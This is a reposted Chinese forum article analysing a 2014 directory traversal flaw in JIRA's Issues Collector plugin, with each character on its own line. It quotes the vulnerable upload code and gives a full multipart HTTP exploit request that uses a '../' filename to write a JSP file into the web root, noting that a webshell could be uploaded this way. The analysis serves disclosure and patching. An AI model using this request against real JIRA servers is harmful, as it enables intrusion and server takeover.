论坛
BBS
空间测绘
发表
发布文章
提问答疑
搜索
您还未登录
登录后即可体验更多功能
立即登录
我的收藏
提问答疑
我要投稿
漏洞
[8022] 2014-05-14_开源BUG跟踪平台JIRA目录遍历漏洞分析
文档创建者:
s7ckTeam
浏览次数:
33
最后更新:
2025-01-17
漏洞
33 人阅读
|
0 人回复
s7ckTeam
s7ckTeam
当前离线
积分
-54
6万
主题
-6万
回帖
-54
积分
管理员
积分
-54
发消息
2014-05-14_开源BUG跟踪平台JIRA目录遍历漏洞分析
开
源
B
U
G
跟
踪
平
台
J
I
R
A
目
录
遍
历
漏
洞
分
析
F
r
e
e
B
u
f
2
0
1
4
-
0
5
-
1
4
作
者
T
a
s
k
i
l
l
e
r
最
近
,
一
则
新
发
布
的
公
告
报
告
了
一
个
影
响
J
i
r
a
5
.
0
.
1
1
和
6
.
0
.
3
版
本
的
目
录
遍
历
漏
洞
,
该
漏
洞
在
去
年
7
月
份
被
验
证
,
并
在
接
下
来
的
几
个
月
得
以
修
复
。
攻
击
方
法
很
简
单
,
但
是
潜
在
影
响
却
是
非
常
大
的
,
该
漏
洞
可
能
允
许
攻
击
者
上
传
文
件
作
为
w
e
b
s
h
e
l
l
。
后
文
我
会
解
决
该
漏
洞
如
何
通
过
静
态
分
析
发
现
,
以
及
什
么
一
个
小
细
节
使
其
只
能
在
W
i
n
d
o
w
s
系
统
上
被
利
用
。
漏
洞
识
别
漏
洞
识
别
以
下
代
码
源
自
插
件
I
s
s
u
e
s
C
o
l
l
e
c
t
o
r
,
该
插
件
使
用
R
E
S
T
a
p
i
,
支
持
上
传
屏
幕
截
图
文
件
作
为
附
件
附
加
到
说
明
中
。
c
o
m
/
a
t
l
a
s
s
i
a
n
/
j
i
r
a
/
c
o
l
l
e
c
t
o
r
/
p
l
u
g
i
n
/
r
e
s
t
/
T
e
m
p
o
r
a
r
y
A
t
t
a
c
h
m
e
n
t
s
R
e
s
o
u
r
c
e
.
j
a
v
a
[
.
.
.
]
@
P
O
S
T
@
P
a
t
h
(
"
m
u
l
t
i
p
a
r
t
/
{
c
o
l
l
e
c
t
o
r
I
d
}
"
)
@
C
o
n
s
u
m
e
s
(
{
"
m
u
l
t
i
p
a
r
t
/
f
o
r
m
-
d
a
t
a
"
}
)
@
P
r
o
d
u
c
e
s
(
{
"
t
e
x
t
/
h
t
m
l
"
}
)
p
u
b
l
i
c
R
e
s
p
o
n
s
e
a
t
t
a
c
h
T
e
m
p
o
r
a
r
y
F
i
l
e
V
i
a
F
o
r
m
(
@
P
a
t
h
P
a
r
a
m
(
"
c
o
l
l
e
c
t
o
r
I
d
"
)
S
t
r
i
n
g
c
o
l
l
e
c
t
o
r
I
d
,
@
M
u
l
t
i
p
a
r
t
F
o
r
m
P
a
r
a
m
(
"
s
c
r
e
e
n
s
h
o
t
"
)
C
o
l
l
e
c
t
i
o
n
<
f
i
l
e
p
a
r
t
>
f
i
l
e
P
a
r
t
s
)
{
S
e
r
v
i
c
e
O
u
t
c
o
m
e
o
u
t
c
o
m
e
=
t
h
i
s
.
c
o
l
l
e
c
t
o
r
S
e
r
v
i
c
e
.
g
e
t
C
o
l
l
e
c
t
o
r
(
c
o
l
l
e
c
t
o
r
I
d
)
;
[
.
.
.
]
F
i
l
e
P
a
r
t
f
i
l
e
P
a
r
t
=
(
F
i
l
e
P
a
r
t
)
f
i
l
e
P
a
r
t
s
.
i
t
e
r
a
t
o
r
(
)
.
n
e
x
t
(
)
;
t
r
y
{
[
.
.
.
]
T
e
m
p
o
r
a
r
y
A
t
t
a
c
h
m
e
n
t
t
e
m
p
o
r
a
r
y
A
t
t
a
c
h
m
e
n
t
=
c
r
e
a
t
e
T
e
m
p
o
r
a
r
y
A
t
t
a
c
h
m
e
n
t
(
f
i
l
e
P
a
r
t
.
g
e
t
N
a
m
e
(
)
,
f
i
l
e
P
a
r
t
.
g
e
t
C
o
n
t
e
n
t
T
y
p
e
(
)
,
f
i
l
e
P
a
r
t
.
g
e
t
I
n
p
u
t
S
t
r
e
a
m
(
)
)
;
t
e
m
p
o
r
a
r
y
A
t
t
a
c
h
m
e
n
t
s
M
o
n
i
t
o
r
.
a
d
d
(
t
e
m
p
o
r
a
r
y
A
t
t
a
c
h
m
e
n
t
)
;
c
o
n
t
e
x
t
.
p
u
t
(
"
t
e
m
p
o
r
a
r
y
A
t
t
a
c
h
m
e
n
t
"
,
t
e
m
p
o
r
a
r
y
A
t
t
a
c
h
m
e
n
t
)
;
r
e
t
u
r
n
R
e
s
p
o
n
s
e
.
o
k
(
r
e
n
d
e
r
T
e
m
p
l
a
t
e
(
"
t
e
m
p
l
a
t
e
s
/
r
e
s
t
/
t
e
m
p
f
i
l
e
j
s
o
n
.
v
m
"
,
c
o
n
t
e
x
t
)
)
.
c
a
c
h
e
C
o
n
t
r
o
l
(
c
o
m
.
a
t
l
a
s
s
i
a
n
.
j
i
r
a
.
r
e
s
t
.
v
1
.
u
t
i
l
.
C
a
c
h
e
C
o
n
t
r
o
l
.
N
O
_
C
A
C
H
E
)
.
b
u
i
l
d
(
)
;
}
c
a
t
c
h
(
I
O
E
x
c
e
p
t
i
o
n
e
)
{
}
r
e
t
u
r
n
R
e
s
p
o
n
s
e
.
s
e
r
v
e
r
E
r
r
o
r
(
)
.
c
a
c
h
e
C
o
n
t
r
o
l
(
c
o
m
.
a
t
l
a
s
s
i
a
n
.
j
i
r
a
.
r
e
s
t
.
v
1
.
u
t
i
l
.
C
a
c
h
e
C
o
n
t
r
o
l
.
N
O
_
C
A
C
H
E
)
.
b
u
i
l
d
(
)
;
}
p
r
i
v
a
t
e
T
e
m
p
o
r
a
r
y
A
t
t
a
c
h
m
e
n
t
c
r
e
a
t
e
T
e
m
p
o
r
a
r
y
A
t
t
a
c
h
m
e
n
t
(
S
t
r
i
n
g
f
i
l
e
N
a
m
e
,
S
t
r
i
n
g
c
o
n
t
e
n
t
T
y
p
e
,
I
n
p
u
t
S
t
r
e
a
m
i
n
p
u
t
S
t
r
e
a
m
)
{
F
i
l
e
t
m
p
D
i
r
=
A
t
t
a
c
h
m
e
n
t
U
t
i
l
s
.
g
e
t
T
e
m
p
o
r
a
r
y
A
t
t
a
c
h
m
e
n
t
D
i
r
e
c
t
o
r
y
(
)
;
l
o
n
g
u
n
i
q
u
e
I
d
;
F
i
l
e
t
e
m
p
A
t
t
a
c
h
m
e
n
t
F
i
l
e
;
d
o
{
u
n
i
q
u
e
I
d
=
g
e
t
U
U
I
D
(
)
;
t
e
m
p
A
t
t
a
c
h
m
e
n
t
F
i
l
e
=
n
e
w
F
i
l
e
(
t
m
p
D
i
r
,
u
n
i
q
u
e
I
d
+
"
_
"
+
f
i
l
e
N
a
m
e
)
;
}
w
h
i
l
e
(
t
e
m
p
A
t
t
a
c
h
m
e
n
t
F
i
l
e
.
e
x
i
s
t
s
(
)
)
;
F
i
l
e
O
u
t
p
u
t
S
t
r
e
a
m
o
u
t
p
u
t
=
n
u
l
l
;
t
r
y
{
o
u
t
p
u
t
=
n
e
w
F
i
l
e
O
u
t
p
u
t
S
t
r
e
a
m
(
t
e
m
p
A
t
t
a
c
h
m
e
n
t
F
i
l
e
)
;
I
O
U
t
i
l
s
.
c
o
p
y
(
i
n
p
u
t
S
t
r
e
a
m
,
o
u
t
p
u
t
)
;
o
u
t
p
u
t
.
c
l
o
s
e
(
)
;
}
c
a
t
c
h
(
I
O
E
x
c
e
p
t
i
o
n
e
)
{
I
O
U
t
i
l
s
.
c
l
o
s
e
Q
u
i
e
t
l
y
(
o
u
t
p
u
t
)
;
l
o
g
.
e
r
r
o
r
(
"
E
r
r
o
r
c
r
e
a
t
i
n
g
t
e
m
p
o
r
a
r
y
a
t
t
a
c
h
m
e
n
t
"
,
e
)
;
r
e
t
u
r
n
n
u
l
l
;
}
r
e
t
u
r
n
n
e
w
T
e
m
p
o
r
a
r
y
A
t
t
a
c
h
m
e
n
t
(
L
o
n
g
.
v
a
l
u
e
O
f
(
u
n
i
q
u
e
I
d
)
,
L
o
n
g
.
v
a
l
u
e
O
f
(
-
1
L
)
,
t
e
m
p
A
t
t
a
c
h
m
e
n
t
F
i
l
e
,
f
i
l
e
N
a
m
e
,
c
o
n
t
e
n
t
T
y
p
e
)
;
}
在
第
3
1
行
,
代
码
将
上
传
的
文
件
移
动
到
一
个
临
时
目
录
中
,
f
i
l
e
n
a
m
e
的
值
没
有
任
何
过
滤
,
该
值
由
多
个
部
分
组
合
而
成
,
因
此
可
以
通
过
客
户
端
控
制
。
3
1
t
e
m
p
A
t
t
a
c
h
m
e
n
t
F
i
l
e
=
n
e
w
F
i
l
e
(
t
m
p
D
i
r
,
u
n
i
q
u
e
I
d
+
"
_
"
+
f
i
l
e
N
a
m
e
)
;
来
源
:
1
3
[
.
.
.
]
c
r
e
a
t
e
T
e
m
p
o
r
a
r
y
A
t
t
a
c
h
m
e
n
t
(
f
i
l
e
P
a
r
t
.
g
e
t
N
a
m
e
(
)
,
f
i
l
e
P
a
r
t
.
g
e
t
C
o
n
t
e
n
t
T
y
p
e
(
)
,
f
i
l
e
P
a
r
t
.
g
e
t
I
n
p
u
t
S
t
r
e
a
m
(
)
)
;
漏
洞
利
用
漏
洞
利
用
为
了
使
文
件
上
传
到
附
件
目
录
之
外
,
可
以
用
一
个
经
典
的
目
录
遍
历
模
式
遍
历
到
公
共
w
e
b
目
录
的
根
目
录
(
/
a
t
l
a
s
s
i
a
n
-
j
i
r
a
/
)
。
在
之
前
示
例
代
码
可
以
看
到
其
并
没
有
对
文
件
内
容
进
行
过
滤
,
因
此
可
以
上
传
一
个
J
S
P
s
h
e
l
l
来
获
取
系
统
权
限
。
P
O
S
T
/
r
e
s
t
/
c
o
l
l
e
c
t
o
r
s
/
1
.
0
/
t
e
m
p
a
t
t
a
c
h
m
e
n
t
/
m
u
l
t
i
p
a
r
t
/
2
c
1
c
e
5
f
a
H
T
T
P
/
1
.
1
H
o
s
t
:
h
a
c
k
m
e
.
a
t
l
a
s
s
i
a
n
.
n
e
t
C
o
o
k
i
e
:
a
t
l
a
s
s
i
a
n
.
x
s
r
f
.
t
o
k
e
n
=
B
Q
7
9
-
A
8
5
Q
-
7
D
O
M
-
U
M
F
N
|
e
9
8
2
3
1
a
a
a
e
f
9
8
a
0
d
9
d
c
7
c
5
2
e
8
7
f
4
e
8
4
c
f
9
c
d
3
0
8
5
C
o
n
n
e
c
t
i
o
n
:
k
e
e
p
-
a
l
i
v
e
C
o
n
t
e
n
t
-
T
y
p
e
:
m
u
l
t
i
p
a
r
t
/
f
o
r
m
-
d
a
t
a
;
b
o
u
n
d
a
r
y
=
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
1
6
2
6
6
3
1
5
5
4
2
4
6
8
C
o
n
t
e
n
t
-
L
e
n
g
t
h
:
3
4
5
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
1
6
2
6
6
3
1
5
5
4
2
4
6
8
C
o
n
t
e
n
t
-
D
i
s
p
o
s
i
t
i
o
n
:
f
o
r
m
-
d
a
t
a
;
n
a
m
e
=
"
s
c
r
e
e
n
s
h
o
t
"
;
f
i
l
e
n
a
m
e
=
"
/
.
.
/
.
.
/
.
.
/
a
t
l
a
s
s
i
a
n
-
j
i
r
a
/
h
e
l
l
o
.
j
s
p
"
C
o
n
t
e
n
t
-
T
y
p
e
:
t
e
x
t
/
p
l
a
i
n
<
h
1
>
H
e
l
l
o
w
o
r
l
d
!
<
/
h
1
>
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
1
6
2
6
6
3
1
5
5
4
2
4
6
8
请
求
中
的
文
件
名
"
/
.
.
/
.
.
/
.
.
/
a
t
l
a
s
s
i
a
n
-
j
i
r
a
/
h
e
l
l
o
.
j
s
p
"
会
被
连
结
到
u
n
i
q
u
e
i
d
从
而
代
替
临
时
目
录
路
径
。
在
W
i
n
d
o
w
s
系
统
上
:
C
:
P
r
o
g
r
a
m
F
i
l
e
s
A
t
l
a
s
s
i
a
n
A
p
p
l
i
c
a
t
i
o
n
D
a
t
a
J
I
R
A
c
a
c
h
e
s
t
m
p
_
a
t
t
a
c
h
m
e
n
t
s
6
1
7
7
7
6
3
4
3
7
0
8
9
9
0
0
9
9
9
_
/
.
.
/
.
.
/
.
.
/
a
t
l
a
s
s
i
a
n
-
j
i
r
a
/
h
e
l
l
o
.
j
s
p
在
L
i
n
u
x
系
统
上
:
/
o
p
t
/
a
t
l
a
s
s
i
a
n
/
j
i
r
a
/
c
a
c
h
e
s
/
t
m
p
_
a
t
t
a
c
h
m
e
n
t
s
/
6
1
7
7
7
6
3
4
3
7
0
8
9
9
0
0
9
9
9
_
/
.
.
/
.
.
/
.
.
/
a
t
l
a
s
s
i
a
n
-
j
i
r
a
/
h
e
l
l
o
.
j
s
p
在
w
i
n
d
o
w
s
系
统
上
路
径
会
被
规
范
化
为
"
C
:
P
r
o
g
r
a
m
F
i
l
e
s
A
t
l
a
s
s
i
a
n
A
p
p
l
i
c
a
t
i
o
n
D
a
t
a
J
I
R
A
a
t
l
a
s
s
i
a
n
-
j
i
r
a
h
e
l
l
o
.
j
s
p
"
,
之
后
文
件
被
写
入
。
换
句
话
说
,
L
i
n
u
x
系
统
会
使
用
整
个
完
整
的
路
径
,
并
会
发
现
目
录
"
/
o
p
t
/
a
t
l
a
s
s
i
a
n
/
j
i
r
a
/
c
a
c
h
e
s
/
t
m
p
_
a
t
t
a
c
h
m
e
n
t
s
/
6
1
7
7
7
6
3
4
3
7
0
8
9
9
0
0
9
9
9
_
"
根
据
不
存
在
,
因
此
无
法
利
用
。
这
里
可
以
将
上
传
的
文
件
替
换
为
一
个
w
e
b
s
h
e
l
l
。
漏
洞
修
补
漏
洞
修
补
如
果
读
者
维
护
着
一
款
J
i
r
a
实
例
,
应
该
已
经
接
收
到
更
新
提
示
了
,
如
果
没
有
,
请
参
考
文
章
开
头
提
到
的
公
告
。
参
考
参
考
J
I
R
A
S
e
c
u
r
i
t
y
A
d
v
i
s
o
r
y
2
0
1
4
-
0
2
-
2
6
:
T
h
e
o
f
f
i
c
i
a
l
a
d
v
i
s
o
r
y
h
t
t
p
s
:
/
/
c
o
n
f
l
u
e
n
c
e
.
a
t
l
a
s
s
i
a
n
.
c
o
m
/
d
i
s
p
l
a
y
/
J
I
R
A
/
J
I
R
A
+
S
e
c
u
r
i
t
y
+
A
d
v
i
s
o
r
y
+
2
0
1
4
-
0
2
-
2
6
W
A
S
C
:
P
a
t
h
t
r
a
v
e
r
s
a
l
:
C
o
m
p
l
e
t
e
d
e
s
c
r
i
p
t
i
o
n
o
f
t
h
e
P
a
t
h
t
r
a
v
e
r
s
a
l
v
u
l
n
e
r
a
b
i
l
i
t
y
h
t
t
p
:
/
/
p
r
o
j
e
c
t
s
.
w
e
b
a
p
p
s
e
c
.
o
r
g
/
w
/
p
a
g
e
/
1
3
2
4
6
9
5
2
/
P
a
t
h
%
2
0
T
r
a
v
e
r
s
a
l
[
v
i
a
h
3
x
s
t
r
e
a
m
]
阅
读
原
文
回复
举报
上一个主题
下一个主题
高级模式
B
Color
Image
Link
Quote
Code
Smilies
您需要登录后才可以回帖
登录
|
立即注册
本版积分规则
发表回复
回帖后跳转到最后一页
浏览过的版块
Web安全
云安全
IOT
安全讯息
发表
漏洞